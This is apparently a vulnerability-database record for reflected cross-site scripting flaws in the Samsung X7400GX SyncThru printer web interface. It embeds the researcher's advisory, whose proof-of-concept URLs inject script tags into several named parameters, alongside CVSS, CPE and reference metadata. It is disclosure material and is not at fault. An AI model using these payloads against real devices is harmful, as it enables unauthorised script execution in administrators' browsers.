VAR-201903-0464
Vulnerability from variot - Updated: 2023-12-18 12:00SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. <!--
Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
Date: 24-01-2019
Exploit Author: Rafael Pedrero
Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
Tested on: all
CVE : CVE-2019-7418
Category: webapps
- Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc.
- Proof of Concept
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed
Parameter frame=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter flag=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter Nfunc=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter func=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter type=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter popupid=alert("XSS");
- Solution:
Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0464",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "syncthru web service",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": "6.a6.25"
},
{
"model": "syncthru web service",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:samsung:syncthru_web_service:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:samsung:x7400gx_firmware:6.a6.25:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:samsung:x7400gx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Rafael Pedrero",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.1
},
"cve": "CVE-2019-7421",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-7421",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-158856",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-7421",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7421",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-577",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-158856",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. \u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7418\n# Category: webapps\n\n1. Description\n\nXSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25\nV11.01.05.25_08-21-2015 in \"/sws/swsAlert.sws\" in multiple parameters:\nflag, frame, func, and Nfunc. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n frame=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n flag=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\n\nParameter\n Nfunc=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n func=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n type=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n popupid=\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7419\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\n\n\nParameter\n ruiFw_title=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_pid=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_id=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7420\n# Category: webapps\n\n1. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n\nParameter\n tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7421\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\n\nParameter\n contextpath=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026popupid=id_Login\n\n\nParameter\n basedURL=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.9
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7421",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "151584",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158856",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
]
},
"id": "VAR-201903-0464",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:27.908000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.samsung.com/"
},
{
"title": "SAMSUNG X7400GX SyncThru Web Service Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=89375"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html"
},
{
"trust": 1.8,
"url": "http://www.samsung.com/support/productsupport/download/index.aspx"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2019/feb/28"
},
{
"trust": 1.7,
"url": "http://www.samsungprinter.com/"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7421"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7421"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_pid=maintenance\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=maintenance\u0026ruifw_title=%3cscript%3ealert(xss);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7418"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7419"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e\u0026popupid=id_login"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://www.samsungprinter.com/,"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7420"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026flag=\u0026frame=\u0026msg=the%20requested%20report(s)%20will%20be%20printed"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-158856"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"date": "2019-02-08T02:22:22",
"db": "PACKETSTORM",
"id": "151584"
},
{
"date": "2019-03-21T16:01:13.063000",
"db": "NVD",
"id": "CVE-2019-7421"
},
{
"date": "2019-02-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-158856"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"date": "2019-03-25T14:23:25.910000",
"db": "NVD",
"id": "CVE-2019-7421"
},
{
"date": "2019-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
